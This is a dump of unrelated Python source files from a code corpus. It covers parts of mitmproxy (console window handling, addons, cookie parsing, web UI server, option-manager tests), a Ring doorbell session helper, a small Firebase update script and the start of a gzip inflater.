def view_changed(self, *args, **kwargs):
"""
Triggered when the view list has changed.
"""
for i in self.stacks:
i.call("view_changed")
def set_overlay(self, o, **kwargs):
"""
Set an overlay on the currently focused stack.
"""
self.focus_stack().set_overlay(o, **kwargs)
self.refresh()
def push(self, wname):
"""
Push a window onto the currently focused stack.
"""
self.focus_stack().push(wname)
self.refresh()
self.view_changed()
self.focus_changed()
def pop(self, *args, **kwargs):
"""
Pop a window from the currently focused stack. If there is only one
window on the stack, this prompts for exit.
"""
if self.focus_stack().pop():
self.master.prompt_for_exit()
else:
self.refresh()
self.view_changed()
self.focus_changed()
def stacks_sorted_by_focus(self):
"""
Returns:
self.stacks, with the focused stack first.
"""
stacks = self.stacks.copy()
stacks.insert(0, stacks.pop(self.pane))
return stacks
def current(self, keyctx):
"""
Returns the active widget with a matching key context, including overlays.
If multiple stacks have an active widget with a matching key context,
the currently focused stack is preferred.
"""
for s in self.stacks_sorted_by_focus():
t = s.top_widget()
if t.keyctx == keyctx:
return t
def current_window(self, keyctx):
"""
Returns the active window with a matching key context, ignoring overlays.
If multiple stacks have an active widget with a matching key context,
the currently focused stack is preferred.
"""
for s in self.stacks_sorted_by_focus():
t = s.top_window()
if t.keyctx == keyctx:
return t
def sig_focus(self, sender, section):
self.focus_position = section
def switch(self):
"""
Switch between the two panes.
"""
if self.master.options.console_layout == "single":
self.pane = 0
else:
self.pane = (self.pane + 1) % len(self.stacks)
self.refresh()
def mouse_event(self, *args, **kwargs):
# args: (size, event, button, col, row)
k = super().mouse_event(*args, **kwargs)
if not k:
if args[1] == "mouse drag":
signals.status_message.send(
message = "Hold down fn, shift, alt or ctrl to select text or use the --no-mouse parameter.",
expire = 1
)
elif args[1] == "mouse press" and args[2] == 4:
self.keypress(args[0], "up")
elif args[1] == "mouse press" and args[2] == 5:
self.keypress(args[0], "down")
else:
return False
return True
def keypress(self, size, k):
k = super().keypress(size, k)
if k:
return self.master.keymap.handle(
self.focus_stack().top_widget().keyctx,
k
)
class Screen(urwid.raw_display.Screen):
def write(self, data):
if common.IS_WSL:
# replace urwid's SI/SO, which produce artifacts under WSL.
# at some point we may figure out what they actually do.
data = re.sub("[\x0e\x0f]", "", data)
super().write(data)
``` |
{
"source": "00cool/project-X",
"score": 2
} |
#### File: examples/simple/custom_option.py
```python
from mitmproxy import ctx
def load(l):
ctx.log.info("Registering option 'custom'")
l.add_option("custom", bool, False, "A custom option")
def configure(updated):
if "custom" in updated:
ctx.log.info("custom option value: %s" % ctx.options.custom)
```
#### File: mitmproxy/addons/anticomp.py
```python
from mitmproxy import ctx
class AntiComp:
def request(self, flow):
if ctx.options.anticomp:
flow.request.anticomp()
```
#### File: mitmproxy/addons/check_ca.py
```python
import mitmproxy
class CheckCA:
def __init__(self):
self.failed = False
def configure(self, updated):
has_ca = (
mitmproxy.ctx.master.server and
mitmproxy.ctx.master.server.config and
mitmproxy.ctx.master.server.config.certstore and
mitmproxy.ctx.master.server.config.certstore.default_ca
)
if has_ca:
self.failed = mitmproxy.ctx.master.server.config.certstore.default_ca.has_expired()
if self.failed:
mitmproxy.ctx.master.add_log(
"The mitmproxy certificate authority has expired!\n"
"Please delete all CA-related files in your ~/.mitmproxy folder.\n"
"The CA will be regenerated automatically after restarting mitmproxy.\n"
"Then make sure all your clients have the new CA installed.",
"warn",
)
```
#### File: mitmproxy/addons/keepserving.py
```python
from mitmproxy import ctx
class KeepServing:
def event_processing_complete(self):
if not ctx.master.options.keepserving:
ctx.master.shutdown()
```
#### File: net/http/cookies.py
```python
import email.utils
import re
import time
from typing import Tuple, List, Iterable
from mitmproxy.coretypes import multidict
"""
A flexible module for cookie parsing and manipulation.
This module differs from usual standards-compliant cookie modules in a number
of ways. We try to be as permissive as possible, and to retain even mal-formed
information. Duplicate cookies are preserved in parsing, and can be set in
formatting. We do attempt to escape and quote values where needed, but will not
reject data that violate the specs.
Parsing accepts the formats in RFC6265 and partially RFC2109 and RFC2965. We
also parse the comma-separated variant of Set-Cookie that allows multiple
cookies to be set in a single header. Serialization follows RFC6265.
http://tools.ietf.org/html/rfc6265
http://tools.ietf.org/html/rfc2109
http://tools.ietf.org/html/rfc2965
"""
_cookie_params = {'expires', 'path', 'comment', 'max-age', 'secure', 'httponly', 'version'}
ESCAPE = re.compile(r"([\"\\])")
class CookieAttrs(multidict.MultiDict):
@staticmethod
def _kconv(key):
return key.lower()
@staticmethod
def _reduce_values(values):
# See the StickyCookieTest for a weird cookie that only makes sense
# if we take the last part.
return values[-1]
TSetCookie = Tuple[str, str, CookieAttrs]
TPairs = List[List[str]] # TODO: Should be List[Tuple[str,str]]?
def _read_until(s, start, term):
"""
Read until one of the characters in term is reached.
"""
if start == len(s):
return "", start + 1
for i in range(start, len(s)):
if s[i] in term:
return s[start:i], i
return s[start:i + 1], i + 1
def _read_quoted_string(s, start):
"""
start: offset to the first quote of the string to be read
A sort of loose super-set of the various quoted string specifications.
RFC6265 disallows backslashes or double quotes within quoted strings.
Prior RFCs use backslashes to escape. This leaves us free to apply
backslash escaping by default and be compatible with everything.
"""
escaping = False
ret = []
# Skip the first quote
i = start # initialize in case the loop doesn't run.
for i in range(start + 1, len(s)):
if escaping:
ret.append(s[i])
escaping = False
elif s[i] == '"':
break
elif s[i] == "\\":
escaping = True
else:
ret.append(s[i])
return "".join(ret), i + 1
def _read_key(s, start, delims=";="):
"""
Read a key - the LHS of a token/value pair in a cookie.
"""
return _read_until(s, start, delims)
def _read_value(s, start, delims):
"""
Reads a value - the RHS of a token/value pair in a cookie.
"""
if start >= len(s):
return "", start
elif s[start] == '"':
return _read_quoted_string(s, start)
else:
return _read_until(s, start, delims)
def _read_cookie_pairs(s, off=0):
"""
Read pairs of lhs=rhs values from Cookie headers.
off: start offset
"""
pairs = []
while True:
lhs, off = _read_key(s, off)
lhs = lhs.lstrip()
if lhs:
rhs = None
if off < len(s) and s[off] == "=":
rhs, off = _read_value(s, off + 1, ";")
pairs.append([lhs, rhs])
off += 1
if not off < len(s):
break
return pairs, off
def _read_set_cookie_pairs(s: str, off=0) -> Tuple[List[TPairs], int]:
"""
Read pairs of lhs=rhs values from SetCookie headers while handling multiple cookies.
off: start offset
specials: attributes that are treated specially
"""
cookies = [] # type: List[TPairs]
pairs = [] # type: TPairs
while True:
lhs, off = _read_key(s, off, ";=,")
lhs = lhs.lstrip()
if lhs:
rhs = None
if off < len(s) and s[off] == "=":
rhs, off = _read_value(s, off + 1, ";,")
# Special handliing of attributes
if lhs.lower() == "expires":
# 'expires' values can contain commas in them so they need to
# be handled separately.
# We actually bank on the fact that the expires value WILL
# contain a comma. Things will fail, if they don't.
# '3' is just a heuristic we use to determine whether we've
# only read a part of the expires value and we should read more.
if len(rhs) <= 3:
trail, off = _read_value(s, off + 1, ";,")
rhs = rhs + "," + trail
pairs.append([lhs, rhs])
# comma marks the beginning of a new cookie
if off < len(s) and s[off] == ",":
cookies.append(pairs)
pairs = []
off += 1
if not off < len(s):
break
if pairs or not cookies:
cookies.append(pairs)
return cookies, off
def _has_special(s: str) -> bool:
for i in s:
if i in '",;\\':
return True
o = ord(i)
if o < 0x21 or o > 0x7e:
return True
return False
def _format_pairs(pairs, specials=(), sep="; "):
"""
specials: A lower-cased list of keys that will not be quoted.
"""
vals = []
for k, v in pairs:
if v is None:
vals.append(k)
else:
if k.lower() not in specials and _has_special(v):
v = ESCAPE.sub(r"\\\1", v)
v = '"%s"' % v
vals.append("%s=%s" % (k, v))
return sep.join(vals)
def _format_set_cookie_pairs(lst):
return _format_pairs(
lst,
specials=("expires", "path")
)
def parse_cookie_header(line):
"""
Parse a Cookie header value.
Returns a list of (lhs, rhs) tuples.
"""
pairs, off_ = _read_cookie_pairs(line)
return pairs
def parse_cookie_headers(cookie_headers):
cookie_list = []
for header in cookie_headers:
cookie_list.extend(parse_cookie_header(header))
return cookie_list
def format_cookie_header(lst):
"""
Formats a Cookie header value.
"""
return _format_pairs(lst)
def parse_set_cookie_header(line: str) -> List[TSetCookie]:
"""
Parse a Set-Cookie header value
Returns:
A list of (name, value, attrs) tuples, where attrs is a
CookieAttrs dict of attributes. No attempt is made to parse attribute
values - they are treated purely as strings.
"""
cookie_pairs, off = _read_set_cookie_pairs(line)
cookies = []
for pairs in cookie_pairs:
if pairs:
cookie, *attrs = pairs
cookies.append((
cookie[0],
cookie[1],
CookieAttrs(attrs)
))
return cookies
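# For illustration, a value such as
# 'foo=bar; Path=/; Max-Age=60, baz=qux'
# parses into two cookies, roughly:
# [("foo", "bar", CookieAttrs([("Path", "/"), ("Max-Age", "60")])),
#  ("baz", "qux", CookieAttrs([]))]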
def parse_set_cookie_headers(headers: Iterable[str]) -> List[TSetCookie]:
rv = []
for header in headers:
cookies = parse_set_cookie_header(header)
rv.extend(cookies)
return rv
def format_set_cookie_header(set_cookies: List[TSetCookie]) -> str:
"""
Formats a Set-Cookie header value.
"""
rv = []
for name, value, attrs in set_cookies:
pairs = [(name, value)]
pairs.extend(
attrs.fields if hasattr(attrs, "fields") else attrs
)
rv.append(_format_set_cookie_pairs(pairs))
return ", ".join(rv)
def refresh_set_cookie_header(c: str, delta: int) -> str:
"""
Args:
c: A Set-Cookie string
delta: Time delta in seconds
Returns:
A refreshed Set-Cookie string
Raises:
ValueError, if the cookie is invalid.
"""
cookies = parse_set_cookie_header(c)
for cookie in cookies:
name, value, attrs = cookie
if not name or not value:
raise ValueError("Invalid Cookie")
if "expires" in attrs:
e = email.utils.parsedate_tz(attrs["expires"])
if e:
f = email.utils.mktime_tz(e) + delta
attrs.set_all("expires", [email.utils.formatdate(f)])
else:
# This can happen when the expires tag is invalid.
# reddit.com sends a an expires tag like this: "Thu, 31 Dec
# 2037 23:59:59 GMT", which is valid RFC 1123, but not
# strictly correct according to the cookie spec. Browsers
# appear to parse this tolerantly - maybe we should too.
# For now, we just ignore this.
del attrs["expires"]
return format_set_cookie_header(cookies)
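# For example (illustrative value), refreshing
# 'foo=bar; expires=Thu, 01 Jan 1970 00:00:00 GMT'
# with delta=3600 rewrites the expires attribute one hour later while leaving
# the foo=bar pair untouched.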
def get_expiration_ts(cookie_attrs):
"""
Determines the time when the cookie will be expired.
Considering both 'expires' and 'max-age' parameters.
Returns: timestamp of when the cookie will expire.
None, if no expiration time is set.
"""
if 'expires' in cookie_attrs:
e = email.utils.parsedate_tz(cookie_attrs["expires"])
if e:
return email.utils.mktime_tz(e)
elif 'max-age' in cookie_attrs:
try:
max_age = int(cookie_attrs['Max-Age'])
except ValueError:
pass
else:
now_ts = time.time()
return now_ts + max_age
return None
def is_expired(cookie_attrs):
"""
Determines whether a cookie has expired.
Returns: boolean
"""
exp_ts = get_expiration_ts(cookie_attrs)
now_ts = time.time()
# If no expiration information was provided with the cookie
if exp_ts is None:
return False
else:
return exp_ts <= now_ts
def group_cookies(pairs):
"""
Converts a list of pairs to a (name, value, attrs) for each cookie.
"""
if not pairs:
return []
cookie_list = []
# First pair is always a new cookie
name, value = pairs[0]
attrs = []
for k, v in pairs[1:]:
if k.lower() in _cookie_params:
attrs.append((k, v))
else:
cookie_list.append((name, value, CookieAttrs(attrs)))
name, value, attrs = k, v, []
cookie_list.append((name, value, CookieAttrs(attrs)))
return cookie_list
```
#### File: tools/web/master.py
```python
import webbrowser
import tornado.httpserver
import tornado.ioloop
from mitmproxy import addons
from mitmproxy import log
from mitmproxy import master
from mitmproxy import optmanager
from mitmproxy.addons import eventstore
from mitmproxy.addons import intercept
from mitmproxy.addons import readfile
from mitmproxy.addons import termlog
from mitmproxy.addons import view
from mitmproxy.addons import termstatus
from mitmproxy.tools.web import app, webaddons, static_viewer
class WebMaster(master.Master):
def __init__(self, options, with_termlog=True):
super().__init__(options)
self.view = view.View()
self.view.sig_view_add.connect(self._sig_view_add)
self.view.sig_view_remove.connect(self._sig_view_remove)
self.view.sig_view_update.connect(self._sig_view_update)
self.view.sig_view_refresh.connect(self._sig_view_refresh)
self.events = eventstore.EventStore()
self.events.sig_add.connect(self._sig_events_add)
self.events.sig_refresh.connect(self._sig_events_refresh)
self.options.changed.connect(self._sig_options_update)
self.options.changed.connect(self._sig_settings_update)
self.addons.add(*addons.default_addons())
self.addons.add(
webaddons.WebAddon(),
intercept.Intercept(),
readfile.ReadFile(),
static_viewer.StaticViewer(),
self.view,
self.events,
)
if with_termlog:
self.addons.add(termlog.TermLog(), termstatus.TermStatus())
self.app = app.Application(
self, self.options.web_debug
)
def _sig_view_add(self, view, flow):
app.ClientConnection.broadcast(
resource="flows",
cmd="add",
data=app.flow_to_json(flow)
)
def _sig_view_update(self, view, flow):
app.ClientConnection.broadcast(
resource="flows",
cmd="update",
data=app.flow_to_json(flow)
)
def _sig_view_remove(self, view, flow, index):
app.ClientConnection.broadcast(
resource="flows",
cmd="remove",
data=flow.id
)
def _sig_view_refresh(self, view):
app.ClientConnection.broadcast(
resource="flows",
cmd="reset"
)
def _sig_events_add(self, event_store, entry: log.LogEntry):
app.ClientConnection.broadcast(
resource="events",
cmd="add",
data=app.logentry_to_json(entry)
)
def _sig_events_refresh(self, event_store):
app.ClientConnection.broadcast(
resource="events",
cmd="reset"
)
def _sig_options_update(self, options, updated):
options_dict = optmanager.dump_dicts(options, updated)
app.ClientConnection.broadcast(
resource="options",
cmd="update",
data=options_dict
)
def _sig_settings_update(self, options, updated):
app.ClientConnection.broadcast(
resource="settings",
cmd="update",
data={k: getattr(options, k) for k in updated}
)
def run(self): # pragma: no cover
iol = tornado.ioloop.IOLoop.instance()
http_server = tornado.httpserver.HTTPServer(self.app)
http_server.listen(self.options.web_port, self.options.web_iface)
iol.add_callback(self.start)
tornado.ioloop.PeriodicCallback(lambda: self.tick(timeout=0), 5).start()
web_url = "http://{}:{}/".format(self.options.web_iface, self.options.web_port)
self.add_log(
"Web server listening at {}".format(web_url),
"info"
)
if self.options.web_open_browser:
success = open_browser(web_url)
if not success:
self.add_log(
"No web browser found. Please open a browser and point it to {}".format(web_url),
"info"
)
try:
iol.start()
except KeyboardInterrupt:
self.shutdown()
def shutdown(self):
tornado.ioloop.IOLoop.instance().stop()
super().shutdown()
def open_browser(url: str) -> bool:
"""
Open a URL in a browser window.
In contrast to webbrowser.open, we limit the list of suitable browsers.
This gracefully degrades to a no-op on headless servers, where webbrowser.open
would otherwise open lynx.
Returns:
True, if a browser has been opened
False, if no suitable browser has been found.
"""
browsers = (
"windows-default", "macosx",
"google-chrome", "chrome", "chromium", "chromium-browser",
"firefox", "opera", "safari",
)
for browser in browsers:
try:
b = webbrowser.get(browser)
except webbrowser.Error:
pass
else:
b.open(url)
return True
return False
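# Hedged usage sketch (not part of mitmproxy itself): the option names used above
# (web_port, web_iface, web_open_browser) come from this file; constructing the master
# from default options is an assumption.
# from mitmproxy import options as moptions
# WebMaster(moptions.Options()).run()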
```
#### File: test/mitmproxy/test_optmanager.py
```python
import copy
import pytest
import typing
import argparse
from mitmproxy import options
from mitmproxy import optmanager
from mitmproxy import exceptions
class TO(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("one", typing.Optional[int], None, "help")
self.add_option("two", typing.Optional[int], 2, "help")
self.add_option("bool", bool, False, "help")
self.add_option("required_int", int, 2, "help")
class TD(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("one", str, "done", "help")
self.add_option("two", str, "dtwo", "help")
class TD2(TD):
def __init__(self):
super().__init__()
self.add_option("three", str, "dthree", "help")
self.add_option("four", str, "dfour", "help")
class TM(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("two", typing.Sequence[str], ["foo"], "help")
self.add_option("one", typing.Optional[str], None, "help")
def test_defaults():
o = TD2()
defaults = {
"one": "done",
"two": "dtwo",
"three": "dthree",
"four": "dfour",
}
for k, v in defaults.items():
assert o.default(k) == v
assert not o.has_changed("one")
newvals = dict(
one="xone",
two="xtwo",
three="xthree",
four="xfour",
)
o.update(**newvals)
assert o.has_changed("one")
for k, v in newvals.items():
assert v == getattr(o, k)
o.reset()
assert not o.has_changed("one")
for k in o.keys():
assert not o.has_changed(k)
def test_required_int():
o = TO()
with pytest.raises(exceptions.OptionsError):
o.parse_setval("required_int", None)
def test_deepcopy():
o = TD()
copy.deepcopy(o)
def test_options():
o = TO()
assert o.keys() == {"bool", "one", "two", "required_int"}
assert o.one is None
assert o.two == 2
o.one = 1
assert o.one == 1
with pytest.raises(TypeError):
TO(nonexistent = "value")
with pytest.raises(Exception, match="Unknown options"):
o.nonexistent = "value"
with pytest.raises(Exception, match="Unknown options"):
o.update(nonexistent = "value")
assert o.update_known(nonexistent = "value") == {"nonexistent": "value"}
rec = []
def sub(opts, updated):
rec.append(copy.copy(opts))
o.changed.connect(sub)
o.one = 90
assert len(rec) == 1
assert rec[-1].one == 90
o.update(one=3)
assert len(rec) == 2
assert rec[-1].one == 3
def test_setter():
o = TO()
f = o.setter("two")
f(99)
assert o.two == 99
with pytest.raises(Exception, match="No such option"):
o.setter("nonexistent")
def test_toggler():
o = TO()
f = o.toggler("bool")
assert o.bool is False
f()
assert o.bool is True
f()
assert o.bool is False
with pytest.raises(Exception, match="No such option"):
o.toggler("nonexistent")
with pytest.raises(Exception, match="boolean options"):
o.toggler("one")
class Rec():
def __init__(self):
self.called = None
def __call__(self, *args, **kwargs):
self.called = (args, kwargs)
def test_subscribe():
o = TO()
r = Rec()
# pytest.raises keeps a reference here that interferes with the cleanup test
# further down.
try:
o.subscribe(r, ["unknown"])
except exceptions.OptionsError:
pass
else:
raise AssertionError
assert len(o.changed.receivers) == 0
o.subscribe(r, ["two"])
o.one = 2
assert not r.called
o.two = 3
assert r.called
assert len(o.changed.receivers) == 1
del r
o.two = 4
assert len(o.changed.receivers) == 0
class binder:
def __init__(self):
self.o = TO()
self.called = False
self.o.subscribe(self.bound, ["two"])
def bound(self, *args, **kwargs):
self.called = True
t = binder()
t.o.one = 3
assert not t.called
t.o.two = 3
assert t.called
def test_rollback():
o = TO()
rec = []
def sub(opts, updated):
rec.append(copy.copy(opts))
recerr = []
def errsub(opts, **kwargs):
recerr.append(kwargs)
def err(opts, updated):
if opts.one == 10:
raise exceptions.OptionsError()
if opts.bool is True:
raise exceptions.OptionsError()
o.changed.connect(sub)
o.changed.connect(err)
o.errored.connect(errsub)
assert o.one is None
with pytest.raises(exceptions.OptionsError):
o.one = 10
assert o.one is None
with pytest.raises(exceptions.OptionsError):
o.bool = True
assert o.bool is False
assert isinstance(recerr[0]["exc"], exceptions.OptionsError)
assert o.one is None
assert o.bool is False
assert len(rec) == 4
assert rec[0].one == 10
assert rec[1].one is None
assert rec[2].bool is True
assert rec[3].bool is False
with pytest.raises(exceptions.OptionsError):
with o.rollback({"one"}, reraise=True):
raise exceptions.OptionsError()
def test_simple():
assert repr(TO())
assert "one" in TO()
def test_items():
assert TO().items()
def test_serialize():
o = TD2()
o.three = "set"
assert "dfour" in optmanager.serialize(o, None, defaults=True)
data = optmanager.serialize(o, None)
assert "dfour" not in data
o2 = TD2()
optmanager.load(o2, data)
assert o2 == o
assert not o == 42
t = """
unknown: foo
"""
data = optmanager.serialize(o, t)
o2 = TD2()
optmanager.load(o2, data)
assert o2 == o
t = "invalid: foo\ninvalid"
with pytest.raises(Exception, match="Config error"):
optmanager.load(o2, t)
t = "invalid"
with pytest.raises(Exception, match="Config error"):
optmanager.load(o2, t)
t = "# a comment"
optmanager.load(o2, t)
assert optmanager.load(o2, "foobar: '123'") == {"foobar": "123"}
t = ""
optmanager.load(o2, t)
assert optmanager.load(o2, "foobar: '123'") == {"foobar": "123"}
def test_serialize_defaults():
o = options.Options()
assert optmanager.serialize(o, None, defaults=True)
def test_saving(tmpdir):
o = TD2()
o.three = "set"
dst = str(tmpdir.join("conf"))
optmanager.save(o, dst, defaults=True)
o2 = TD2()
optmanager.load_paths(o2, dst)
o2.three = "foo"
optmanager.save(o2, dst, defaults=True)
optmanager.load_paths(o, dst)
assert o.three == "foo"
with open(dst, 'a') as f:
f.write("foobar: '123'")
assert optmanager.load_paths(o, dst) == {"foobar": "123"}
with open(dst, 'a') as f:
f.write("'''")
with pytest.raises(exceptions.OptionsError):
optmanager.load_paths(o, dst)
with open(dst, 'wb') as f:
f.write(b"\x01\x02\x03")
with pytest.raises(exceptions.OptionsError):
optmanager.load_paths(o, dst)
with pytest.raises(exceptions.OptionsError):
optmanager.save(o, dst)
with open(dst, 'wb') as f:
f.write(b"\xff\xff\xff")
with pytest.raises(exceptions.OptionsError):
optmanager.load_paths(o, dst)
with pytest.raises(exceptions.OptionsError):
optmanager.save(o, dst)
def test_merge():
m = TM()
m.merge(dict(one="two"))
assert m.one == "two"
m.merge(dict(one=None))
assert m.one == "two"
m.merge(dict(two=["bar"]))
assert m.two == ["foo", "bar"]
def test_option():
o = optmanager._Option("test", int, 1, "help", None)
assert o.current() == 1
with pytest.raises(TypeError):
o.set("foo")
with pytest.raises(TypeError):
optmanager._Option("test", str, 1, "help", None)
o2 = optmanager._Option("test", int, 1, "help", None)
assert o2 == o
o2.set(5)
assert o2 != o
def test_dump_defaults():
o = options.Options()
assert optmanager.dump_defaults(o)
def test_dump_dicts():
o = options.Options()
assert optmanager.dump_dicts(o)
assert optmanager.dump_dicts(o, ['http2', 'anticomp'])
class TTypes(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("str", str, "str", "help")
self.add_option("optstr", typing.Optional[str], "optstr", "help", "help")
self.add_option("bool", bool, False, "help")
self.add_option("bool_on", bool, True, "help")
self.add_option("int", int, 0, "help")
self.add_option("optint", typing.Optional[int], 0, "help")
self.add_option("seqstr", typing.Sequence[str], [], "help")
self.add_option("unknown", float, 0.0, "help")
def test_make_parser():
parser = argparse.ArgumentParser()
opts = TTypes()
opts.make_parser(parser, "str", short="a")
opts.make_parser(parser, "bool", short="b")
opts.make_parser(parser, "int", short="c")
opts.make_parser(parser, "seqstr", short="d")
opts.make_parser(parser, "bool_on", short="e")
with pytest.raises(ValueError):
opts.make_parser(parser, "unknown")
def test_set():
opts = TTypes()
opts.set("str=foo")
assert opts.str == "foo"
with pytest.raises(TypeError):
opts.set("str")
opts.set("optstr=foo")
assert opts.optstr == "foo"
opts.set("optstr")
assert opts.optstr is None
opts.set("bool=false")
assert opts.bool is False
opts.set("bool")
assert opts.bool is True
opts.set("bool=true")
assert opts.bool is True
with pytest.raises(exceptions.OptionsError):
opts.set("bool=wobble")
opts.set("bool=toggle")
assert opts.bool is False
opts.set("bool=toggle")
assert opts.bool is True
opts.set("int=1")
assert opts.int == 1
with pytest.raises(exceptions.OptionsError):
opts.set("int=wobble")
opts.set("optint")
assert opts.optint is None
assert opts.seqstr == []
opts.set("seqstr=foo")
assert opts.seqstr == ["foo"]
opts.set("seqstr=bar")
assert opts.seqstr == ["foo", "bar"]
opts.set("seqstr")
assert opts.seqstr == []
with pytest.raises(exceptions.OptionsError):
opts.set("nonexistent=wobble")
```
#### File: test/mitmproxy/test_taddons.py
```python
import io
from mitmproxy.test import taddons
from mitmproxy.test import tutils
from mitmproxy import ctx
def test_recordingmaster():
with taddons.context() as tctx:
assert not tctx.master.has_log("nonexistent")
assert not tctx.master.has_event("nonexistent")
ctx.log.error("foo")
assert not tctx.master.has_log("foo", level="debug")
assert tctx.master.has_log("foo", level="error")
def test_dumplog():
with taddons.context() as tctx:
ctx.log.info("testing")
s = io.StringIO()
tctx.master.dump_log(s)
assert s.getvalue()
def test_load_script():
with taddons.context() as tctx:
s = tctx.script(
tutils.test_data.path(
"mitmproxy/data/addonscripts/recorder/recorder.py"
)
)
assert s
```
#### File: 00cool/project-X/updateData.py
```python
import json
import sys
import threading
from threading import Thread
from connect import sendDataToFire
sys.path.append('../')
from renderQuery import queryG, queryY, web
def prepareTOsend():
while True:
sendDataToFire(json.dumps(queryG))
prepareTOsend()
``` |
{
"source": "00Duck/RingSlackPy",
"score": 3
} |
#### File: 00Duck/RingSlackPy/ring_session.py
```python
import json
import getpass
import logging
from uuid import uuid4 as uuid
from ring_doorbell import Ring, Auth
from pathlib import Path
import traceback
class RingSession:
"""
Starts a Ring session. Create a cache file and pass it into this class. On first run, log in with your
username, password and 2FA token (verified through the Ring app). Once a refresh token is cached, later sessions re-use the token from the cache file.
"""
def __init__(self, cache_file):
self.cache_file = cache_file
self.ring = None
logging.basicConfig(format='%(asctime)s\t%(levelname)s\t%(message)s',
datefmt='%Y-%d-%m %H:%M:%S', filename='server.log', level=logging.INFO)
def get_doorbot_by_id(self, id: str):
if self.ring == None:
return
devices = self.ring.devices()
for device in devices['doorbots'] or []:
if str(device.id) == id:
return device
return None
def take_screenshot(self, device_id: str):
if self.ring == None:
return
device = self.get_doorbot_by_id(device_id)
if device != None:
device.get_snapshot(retries=3, delay=2, filename="last_screenshot.jpg")
def get_battery_life(self, device_id: str):
if self.ring == None:
return None
device = self.get_doorbot_by_id(device_id)
if device != None:
return device.battery_life
return None
def hardware_id(self, hwp) -> str:
if hwp.is_file():
return str(hwp.read_text())
else:
uid = str(uuid())
hwp.write_text(uid)
return uid
def token_updater(self, token):
"""Write to the cache file to update with the latest refresh token. Used by the Auth class"""
token['scope'] = "client" # overwritten because other APIs expect "client" instead of ["client"]
self.cache_file.write_text(json.dumps(token))
def create_ring(self):
"""Authenticates your user and returns a Ring instance to be queried further."""
if self.cache_file.is_file():
auth = Auth("android:com.ringapp",
json.loads(self.cache_file.read_text()), self.token_updater, self.hardware_id(Path('hw_id.cache')))
else:
username = input("user: ")
password = getpass.getpass("password: ")
token = input("2FA code: ")
auth = Auth("android:com.ringapp", None, self.token_updater, self.hardware_id(Path('hw_id.cache')))
try:
auth.fetch_token(username, password, token)
except:
logging.error("Problem fetching token from input authorization.")
quit()
ring = Ring(auth)
if ring.session is None:
try:
ring.create_session()
except:
print(traceback.format_exc())
logging.error("Authorization error - token likely expired.")
quit()
self.ring = ring
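# Hedged usage sketch (not part of the original file): the cache file name and device id
# below are hypothetical placeholders.
# session = RingSession(Path("token.cache"))
# session.create_ring()
# session.take_screenshot("12345678")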
``` |
{
"source": "00ff0000red/raw-wasm",
"score": 2
} |
#### File: raw-wasm/inflate/inflate.py
```python
import argparse
import sys
MAXBITS = 15
MAXCLCODES = 19
MAXLCODES = 286
MAXDCODES = 32
FIXLCODES = 288
FIXED_LIT_LENS = [8] * 144 + [9] * 112 + [7] * 24 + [8] * 8
FIXED_DIST_LENS = [5] * 32
CODELEN_LITS = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]
LENGTH_BASE = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258]
DIST_BASE = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577]
EXTRA_LENGTH_BITS = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0]
EXTRA_DIST_BITS = [0, 0, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 13, 13]
class Huffman(object):
def __init__(self, lens, maxsyms):
# build count
self.count = [0] * (MAXBITS+1)
for l in lens:
self.count[l] += 1
# build offset
offs = [0, 0]
for i in range(1, MAXBITS):
offs.append(offs[i] + self.count[i])
# build code -> symbol
self.symbol = [0] * maxsyms
for i, l in enumerate(lens):
if l != 0:
self.symbol[offs[l]] = i
offs[l] += 1
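# Worked example (illustrative, not in the original file): canonical lengths
# lens = [2, 1, 3, 3] give symbol 1 the 1-bit code 0, symbol 0 the 2-bit code 10,
# and symbols 2 and 3 the 3-bit codes 110 and 111; ReadCode() below recovers exactly
# this ordering one bit at a time from count[] and symbol[].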
class Inflater(object):
def __init__(self, data):
self.input = data + b'\0\0' # So we can read a little past the end
# gzip header
assert(self.input[0] == 0x1f)
assert(self.input[1] == 0x8b)
assert(self.input[2] == 0x08)
flags = self.input[3]
has_text = (flags & 1) != 0
has_crc16 = (flags & 2) != 0
has_extra = (flags & 4) != 0
has_name = (flags & 8) != 0
has_comment = (flags & 0x10) != 0
assert(not has_text)
assert(not has_crc16)
assert(not has_extra)
assert(not has_comment)
self.bit_idx = 80 # After the header
if has_name:
while self.input[self.bit_idx // 8] != 0:
self.bit_idx += 8
self.bit_idx += 8
self.output = []
def Inflate(self):
while self.ReadBlock():
pass
return self.output
def ReadBits(self, n):
byte_idx = self.bit_idx // 8
bit_idx = self.bit_idx & 7
data = self.input[byte_idx]
data |= self.input[byte_idx + 1] << 8
data |= self.input[byte_idx + 2] << 16
data >>= bit_idx
data &= ((1 << n) - 1)
self.bit_idx += n
# print(f'ReadBits({n}) => {data}')
return data
def ReadBlock(self):
bfinal = self.ReadBits(1)
btype = self.ReadBits(2)
if btype == 0: # uncompressed
self.bit_idx = (self.bit_idx + 7) & ~7 # align
len_ = self.ReadBits(16)
nlen_ = self.ReadBits(16)
self.output.extend(self.input[self.bit_idx // 8:self.bit_idx // 8 + len_]) # copy stored bytes from the current position, not from the start of the stream
self.bit_idx += len_ * 8
return not bfinal
elif btype == 1: # fixed huffman
lit_huff = Huffman(FIXED_LIT_LENS, FIXLCODES)
dist_huff = Huffman(FIXED_DIST_LENS, MAXDCODES)
elif btype == 2: # dynamic huffman
hlit = self.ReadBits(5) + 257
hdist = self.ReadBits(5) + 1
hclen = self.ReadBits(4) + 4
lens = [0] * MAXCLCODES
for i in range(hclen):
lens[CODELEN_LITS[i]] = self.ReadBits(3)
codelen_huff = Huffman(lens, MAXCLCODES)
